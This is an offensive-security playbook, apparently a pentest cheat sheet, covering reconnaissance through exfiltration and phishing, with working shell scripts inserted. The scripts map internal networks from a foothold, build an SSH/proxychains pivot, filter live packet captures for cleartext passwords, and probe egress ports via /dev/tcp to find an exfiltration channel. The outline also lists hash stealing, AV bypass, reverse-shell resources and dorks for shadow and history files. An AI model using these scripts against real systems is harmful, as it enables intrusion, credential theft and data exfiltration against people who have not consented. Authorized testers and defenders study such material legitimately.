- Reconnaissance
  - Passive/Semi-Passive
    - Third Party Resources
      - Locate Target Range
        - ARIN - https://www.arin.net/
      - Fingerprint Domain/Website
        - Shodan - https://www.shodan.io/
        - Censys - https://www.censys.io/
        - Zoomeye - https://www.zoomeye.org
        - Netcraft - https://www.netcraft.com/
      - Extended Network Information
        - Central Ops - https://centralops.net/co/DomainDossier.aspx
        - Robtex - https://www.robtex.net/
    - Metasploit Scanning
      - auxiliary/scanner/*
        - portscan/tcp
        - http/http_version
        - http/tomcat_enum
        - http/trace_axd
          - Google - site:<result from above> filetype:axd OR inurl:trace.axd
    - Command Line Recon
      - Network Information
        - nslookup <target>
        - DNS cache snooping (query a resolver with recursion disabled; an answer means the name is already cached)
        - dig <target>
      - Security Mechanisms
        - halberd (load balancer detection)
      - Metadata
        - exiftool
        - strings
          - strings -e b (16-bit big endian) OR -e l (16-bit little endian) for UTF-16 strings that plain strings misses
    - People Search
      - Yahoo People Search - http://itools.com/tool/yahoo-people-search
      - Switchboard - http://www.switchboard.com/person
      - Google Finance - https://www.google.com/finance
      - Zaba - http://www.zabasearch.com/
  - Active
    - Command Line Recon Tools
      - General Recon
        - Recon-NG
          - Automated with https://github.com/jhaddix/domain
      - Domain/Subdomain Information
        - Fierce
        - The Harvester
        - Dirb
        - Dirbuster
        - Nmap
          - nmap -Pn -sSU -sV --top-ports 20 <target> (run as root: -sS and -sU need raw sockets)
      - Create Custom Wordlist
        - cewl - https://digi.ninja/projects/cewl.php
        - wget - http://wiki.securityweekly.com/wiki/index.php/Episode129
    - Software
      - FOCA
      - SPARTA
      - Maltego
      - Dirbuster
    - Browser Extensions
      - Chrome
      - Firefox
      - Safari
    - Google Searching
      - site:"target name" jobs,careers,openings,etc
      - intitle:"index of <Keyword>"
        - Keyword
          - .bash_history
          - etc/shadow
          - finances.xls(x)
          - htpasswd
          - inurl:maillog
      - site:*.edu filetype:*.bak OR <keyword>
        - Keyword
          - *.conf
          - *.backup
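The nslookup/dig/cache-snooping items above are single lookups. The script below is an added example, not part of the original paste: it runs the usual DNS pass against a target (basic records, a zone transfer attempt against every name server, and the cache-snooping check with recursion disabled). It assumes dig from bind-utils/dnsutils is installed; the domain and the resolver to snoop are placeholders passed on the command line. The output parsing is kept in separate helpers so it can be checked offline on constructed dig output.

```sh
#!/bin/sh
# Added example for the dig / nslookup / DNS cache snooping items.
# Not from the original paste. Assumes 'dig' (bind-utils / dnsutils).

# Strip trailing dots and blank lines from 'dig +short NS' output so the
# names can be fed back to dig as @server. Reads stdin.
ns_names() {
    sed -e 's/\.$//' -e '/^$/d'
}

# Classify a 'dig +norecurse' transcript read from stdin.
# A resolver asked with the RD bit clear can only answer from its cache, so a
# non-zero ANSWER count means a client behind that resolver looked the name
# up recently; zero means not cached (or the resolver ignores RD=0).
snoop_verdict() {
    hdr=$(grep -m1 '^;; flags:' || true)
    case "$hdr" in
        *"ANSWER: 0,"*) echo "not-cached" ;;
        *"ANSWER: "*)   echo "cached" ;;
        *)              echo "no-header" ;;
    esac
}

# True when an AXFR transcript (stdin) contains at least one record line,
# i.e. the server allowed the transfer. A refused transfer prints only
# comment lines such as "; Transfer failed.".
axfr_allowed() {
    grep -Eq '^[^;[:space:]].*[[:space:]]IN[[:space:]]'
}

# Network pass. usage: dns_recon <domain> [resolver-to-snoop]
dns_recon() {
    dom=$1; resolver=${2:-}
    echo "[*] Basic records for $dom"
    for t in A AAAA MX NS TXT SOA; do
        printf '%-5s %s\n' "$t" "$(dig +short "$t" "$dom" | tr '\n' ' ')"
    done
    echo "[*] Zone transfer attempts"
    dig +short NS "$dom" | ns_names | while read -r ns; do
        if dig "@$ns" "$dom" AXFR +noall +answer +time=5 | axfr_allowed; then
            echo "    $ns ALLOWS AXFR for $dom (dump it: dig @$ns $dom AXFR)"
        else
            echo "    $ns refused"
        fi
    done
    if [ -n "$resolver" ]; then
        echo "[*] Cache snooping $dom via $resolver: $(dig "@$resolver" "$dom" +norecurse | snoop_verdict)"
    fi
}

# Runs only when given arguments, e.g.: sh dns_recon.sh <domain> <resolver>
if [ $# -gt 0 ]; then dns_recon "$@"; fi
```

The snooping verdict is only meaningful against a resolver that honours RD=0 (most caching resolvers do); an authoritative server answers regardless, so run it against the target's internal or ISP resolver, not their authoritative NS.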
- Enumeration
  - Internal
    - Scanning
      - Map Internal Network
        - Command Line Tools
          - arp -a
          - ip neigh show
          - smbtree -NS 2>/dev/null
          - nbtscan -r <current_IPrange>
          - netdiscover -r <current_IPrange>
          - nmap -n -Pn -T5 -sS <current_IPrange>
        - nmap NSE scripts
          - NFS
          - SMB
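Every command in the Map Internal Network list needs <current_IPrange>, which on a fresh foothold you have to work out from the host's own addresses. The script below is an added example, not part of the original paste: it derives the CIDR of each non-loopback IPv4 interface and then runs whichever of the listed tools are installed. It assumes a Linux host with iproute2 (ip); the netdiscover -P flag (print and exit instead of the interactive screen) and the nmap flags are real, and -T4 replaces the paste's -T5 because -T5 drops probes on busy segments. The network arithmetic is in its own function so it can be checked offline.

```sh
#!/bin/sh
# Added example for "Map Internal Network". Not from the original paste.
# Assumes Linux with iproute2; every scanner below is optional.

# Convert "a.b.c.d/len" to its network CIDR, e.g. 10.1.37.200/24 -> 10.1.37.0/24.
network_of() {
    addr=${1%/*}; len=${1#*/}
    oifs=$IFS; IFS=.; set -- $addr; IFS=$oifs
    ip_int=$(( ($1 << 24) | ($2 << 16) | ($3 << 8) | $4 ))
    mask=$(( (4294967295 << (32 - len)) & 4294967295 ))
    net=$(( ip_int & mask ))
    printf '%d.%d.%d.%d/%d\n' \
        $(( (net >> 24) & 255 )) $(( (net >> 16) & 255 )) \
        $(( (net >> 8) & 255 ))  $(( net & 255 )) "$len"
}

# Parse 'ip -o -4 addr show' lines (stdin) into unique network CIDRs.
# Field 4 of the one-line format is the address with prefix length.
ranges_from_ip_output() {
    awk '$3 == "inet" {print $4}' | while read -r cidr; do
        network_of "$cidr"
    done | sort -u
}

# Live version: scope global drops loopback and link-local noise.
local_ranges() {
    ip -o -4 addr show scope global | ranges_from_ip_output
}

have() { command -v "$1" >/dev/null 2>&1; }

# Discovery pass over one range, quietest first: the neighbour cache sends
# nothing, ARP sweeps stay on the local segment, nmap is loudest.
map_range() {
    r=$1
    echo "[*] Mapping $r"
    echo "[+] Neighbour cache (no packets sent)"
    ip neigh show
    if have arp;         then arp -a; fi
    if have smbtree;     then smbtree -NS 2>/dev/null; fi
    if have nbtscan;     then nbtscan -r "$r"; fi
    if have netdiscover; then netdiscover -r "$r" -P; fi
    if have nmap; then
        # SYN scan needs raw sockets; fall back to connect scan when not root.
        if [ "$(id -u)" -eq 0 ]; then st=-sS; else st=-sT; fi
        nmap -n -Pn -T4 "$st" --top-ports 100 -oA "scan_$(echo "$r" | tr / _)" "$r"
    fi
}

# usage: sh map_internal.sh run
if [ "${1:-}" = "run" ]; then
    local_ranges | while read -r r; do map_range "$r"; done
fi
```

Once the first hosts are known, follow up with the NSE script items from the list (e.g. --script nfs-showmount,smb-os-discovery,smb-enum-shares against the hits) rather than sweeping the whole range with scripts.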
    - Pivoting
      - SSH Proxy Tunneling with Proxychains
        - http://magikh0e.ihtb.org/pubPapers/ssh_gymnastics_tunneling.html
  - External
    - Scanning
      - Nmap
      - Unicornscan
      - OneTwoPunch
        - Combines nmap and unicornscan: https://github.com/superkojiman/onetwopunch/blob/master/onetwopunch.sh
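The pivoting item above is only a link. As an added example (not from the original paste or the linked paper), this is the minimal SSH dynamic-forward plus proxychains setup it refers to, with the two settings that usually get missed: proxy_dns so name lookups happen inside the target network, and a connect scan (-sT -Pn) because SYN probes and ICMP cannot traverse a SOCKS proxy. It assumes an OpenSSH client, proxychains-ng (proxychains4) and ss from iproute2 on the attacking box; <user>@<pivot> is a placeholder for the compromised host you can SSH to.

```sh
#!/bin/sh
# Added example for "SSH Proxy Tunneling with Proxychains".
# Not from the original paste. Assumes OpenSSH, proxychains-ng, iproute2.

# Emit a proxychains config that routes everything through a local SOCKS5
# listener. proxy_dns keeps DNS queries from leaking out of the attack box.
proxychains_conf() {
    port=${1:-1080}
    cat <<EOF
strict_chain
proxy_dns
tcp_read_time_out 15000
tcp_connect_time_out 8000
[ProxyList]
socks5 127.0.0.1 $port
EOF
}

# Start the dynamic forward in the background: -D local SOCKS5 listener,
# -N no remote command, -f fork after auth. Waits until the port is up.
start_pivot() {
    target=$1; port=${2:-1080}
    ssh -f -N -D "127.0.0.1:$port" -o ExitOnForwardFailure=yes "$target"
    i=0
    while ! ss -ltn 2>/dev/null | grep -q ":$port "; do
        i=$((i + 1))
        if [ "$i" -ge 10 ]; then
            echo "SOCKS port $port never came up" >&2
            return 1
        fi
        sleep 1
    done
}

# Only full TCP connects traverse SOCKS: no -sS, no ping sweep, no UDP.
# -n avoids nmap's own resolver; names are resolved via proxy_dns instead.
pivot_nmap() {
    conf=$1; shift
    proxychains4 -q -f "$conf" nmap -sT -Pn -n "$@"
}

# usage: sh pivot.sh run <user>@<pivot> 10.10.10.0/24
if [ "${1:-}" = "run" ]; then
    start_pivot "$2" 1080
    proxychains_conf 1080 > ./proxychains.conf
    pivot_nmap ./proxychains.conf --top-ports 50 "$3"
fi
```

Scanning a /24 through a SOCKS tunnel is slow; keep the port list short and scan hosts found by the internal mapping step rather than whole ranges.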
- Exploitation
  - External
    - Web Vulnerability Scanners
      - Burp
        - https://portswigger.net/burp/
        - My Guide: http://pastebin.com/nNHYP9Jd
      - Wapiti
        - http://wapiti.sourceforge.net/
      - w3af
        - http://w3af.org/
      - Nikto
        - https://cirt.net/Nikto2
    - Framework
      - web2attack
        - https://github.com/santatic/web2attack
    - Command Line Tools
      - CMSmap
        - https://github.com/Dionach/CMSmap
      - WPscan
        - https://wpscan.org/
      - Joomscan
        - https://www.owasp.org/index.php/Category:OWASP_Joomla_Vulnerability_Scanner_Project
  - Internal
    - LAN Attacks
      - Local Python Server
        - Serve Shells/Exploits
          - python -m SimpleHTTPServer <port> (Python 2) or python3 -m http.server <port> (Python 3); serves the current directory
      - LLMNR/NBT-NS Poisoning
        - Responder - https://github.com/SpiderLabs/Responder
          - Listens for and answers LLMNR and NBT-NS name requests to capture NetNTLM hashes
    - Local Vulnerability Scanning
      - LinEnum - https://github.com/rebootuser/LinEnum
      - unix-privesc-check
      - Linux_Exploit_Suggester
      - Comprehensive Linux Enumeration
        - http://www.rebootuser.com/?p=1623
    - Bypass AV
      - PowerSploit - PowerShell shell
        - https://www.hackingloops.com/powersploit-quick-shell-for-penetration-testing/
    - Download Files via Command Line
      - https://www.greyhathacker.net/?p=500
    - Reverse Shells
      - http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
      - https://highon.coffee/blog/reverse-shell-cheat-sheet/
    - Attack Tools
      - Responder - https://github.com/SpiderLabs/Responder
      - SMBExec - https://github.com/pentestgeek/smbexec
      - WCE - http://www.darknet.org.uk/2015/02/windows-credentials-editor-wce-list-add-change-logon-sessions/
- Post-Exploitation
  - Comprehensive Wiki
    - http://pwnwiki.io/#!index.md
  - Pivoting
  - Stealing Hashes
    - WCE - http://www.darknet.org.uk/2015/02/windows-credentials-editor-wce-list-add-change-logon-sessions/
  - Password Sniffing
    - Tcpdump (options must come before the capture filter; -l line-buffers output so the grep sees lines live)
      - tcpdump -i eth0 -l -A 'port http or port ftp or port smtp or port imap or port pop3' | egrep -i --line-buffered --color=auto 'pass=|pwd=|log=|login=|user=|username=|pw=|passw=|passwd=|password=|name=|name:|pass:|user:|username:|password:|login:|pass |user '
    - Ngrep
      - ngrep -q -W byline "GET|POST HTTP"
    - Dsniff
      - dsniff -m
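The tcpdump | egrep one-liner is easy to get subtly wrong: the version of it that circulates in pastes contains "password=||name=", and the empty alternative between the two bars matches every line, so the filter silently passes all traffic. The block below is an added example, not from the original paste. It keeps the pattern in a variable you can reuse against tcpdump -A, ngrep -W byline or a saved pcap replayed with tcpdump -r, adds the "Authorization: Basic" header the original term list misses, and runs both the broken and the fixed pattern over a constructed sample (not real captured traffic) to show the difference.

```sh
#!/bin/sh
# Added example for the password-sniffing grep. Not from the original paste.
# Only needs grep (GNU or BSD; --line-buffered exists in both).

# The circulating pattern, kept only to demonstrate the bug: the empty
# alternative in "password=||name=" matches every line.
BROKEN_PATTERN='pass=|pwd=|log=|login=|user=|username=|pw=|passw=|passwd=|password=||name=|name:|pass:|user:|username:|password:|login:|pass |user '

# Same terms with the empty alternative removed, plus HTTP Basic auth,
# which carries user:pass base64-encoded and never contains "pass=".
CRED_PATTERN='pass=|pwd=|log=|login=|user=|username=|pw=|passw=|passwd=|password=|name=|name:|pass:|user:|username:|password:|login:|pass |user |authorization: basic'

# Filter stdin to credential-looking lines. --line-buffered matters when the
# input is a live capture; without it grep holds output until its buffer fills.
grep_creds() {
    grep -E -i --line-buffered "$CRED_PATTERN"
}
# Live use:
#   tcpdump -i eth0 -l -A 'port 80 or port 21 or port 25 or port 110 or port 143' | grep_creds
#   ngrep -q -W byline 'GET|POST' port 80 | grep_creds

# Count of matching lines on stdin for a given pattern (used below to
# compare the two patterns).
count_matches() {
    grep -E -i -c "$1"
}

# Constructed sample in the style of tcpdump -A output: one form POST,
# one FTP login, one Basic-auth request, and some non-credential lines.
sample_traffic() {
    cat <<'EOF'
GET /index.html HTTP/1.1
Host: intranet.example.internal
User-Agent: curl/7.64.1
POST /login HTTP/1.1
user=alice&password=Winter2016%21
USER bob
PASS hunter2
Authorization: Basic Ym9iOmh1bnRlcjI=
EOF
}

# usage: sh cred_grep.sh demo
if [ "${1:-}" = "demo" ]; then
    echo "broken pattern matches $(sample_traffic | count_matches "$BROKEN_PATTERN") of 8 lines"
    echo "fixed pattern matches  $(sample_traffic | count_matches "$CRED_PATTERN") of 8 lines:"
    sample_traffic | grep_creds
fi
```

The term list still produces false positives ("name=" hits any form field ending in name) and misses anything not in cleartext; it is a first pass, not a replacement for dsniff's protocol parsers.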
  - Attack Frameworks/Tools
    - Empire
      - http://www.powershellempire.com/
    - Armitage
      - http://blog.cobaltstrike.com/2016/05/25/raffis-abridged-guide-to-cobalt-strike/
  - Privilege Escalation
    - PowerSploit - https://github.com/PowerShellMafia/PowerSploit
    - Download Files via Command Line
      - https://www.greyhathacker.net/?p=500
  - Information Gathering
    - LinEnum - http://www.rebootuser.com/?p=1758
- Exfiltration
  - Detection Capabilities
    - Egress-Assess
      - https://github.com/ChrisTruncer/Egress-Assess
    - Outbound Port Detection (find unfiltered outbound connections)
      - http://www.floyd.ch/?p=352
  - Network Exfiltration
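Outbound port detection, as linked above, works by having a box you control accept connections on every port (for example one listener with an iptables REDIRECT rule in front of it) and probing it from the foothold to see which destination ports the egress filter lets through. The probe side below is an added example, not from the original paste or the linked post. It uses bash's /dev/tcp so it runs on a foothold without nc or nmap, and coreutils timeout to tell a filtered port (no response) from a closed one (immediate refusal); <listener> is a placeholder for your own host.

```sh
#!/bin/sh
# Added example for "Outbound Port Detection". Not from the original paste.
# Assumes bash and coreutils 'timeout' on the foothold; the listener is yours.

# Probe one TCP port. Prints "<port> open|closed|filtered"; returns 0 only
# when the connect succeeded. timeout exits 124 on expiry, bash exits 1 on
# an immediate refusal, so the two failure modes can be told apart.
probe_port() {
    host=$1; port=$2
    rc=0
    timeout 3 bash -c "exec 3<>/dev/tcp/$host/$port" 2>/dev/null || rc=$?
    case $rc in
        0)   echo "$port open"; return 0 ;;
        124) echo "$port filtered" ;;
        *)   echo "$port closed" ;;
    esac
    return 1
}

# Probe a list of ports, defaulting to the ones egress policies most often
# leave open. A hit on 53 or 443 is usually the channel to build on.
egress_scan() {
    host=$1; shift
    for p in ${*:-21 22 25 53 80 110 143 443 445 993 995 1433 3306 3389 8080 8443}; do
        probe_port "$host" "$p" || true
    done
}

# usage: sh egress.sh run <listener> [port ...]
if [ "${1:-}" = "run" ]; then
    shift
    egress_scan "$@"
fi
```

A port reported open only proves a TCP handshake completed; on proxied networks the handshake may be with an inspecting proxy rather than your listener, so confirm by sending a marker string and checking it arrived on the listener side.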
- Phishing
  - Important: Immediately pivot from initial host
  - Tools
    - Empire
      - https://enigma0x3.net/2016/03/15/phishing-with-empire/
    - Gophish
      - https://github.com/gophish/gophish
- Initial Access Techniques
  - Office Macros
  - Tools for Internal Use
    - PowerView - Invoke-StealthUserHunter
- Misc.
  - Find Exploits
    - Linux
      - Command line
        - searchsploit -e "Windows 7"
        - searchsploit windows 2007 | grep -i local
    - Web
      - Exploit-db
        - https://www.exploit-db.com/
      - Packet Storm
        - https://packetstormsecurity.com/files/tags/exploit
  - Various Automation
    - https://github.com/leebaird/discover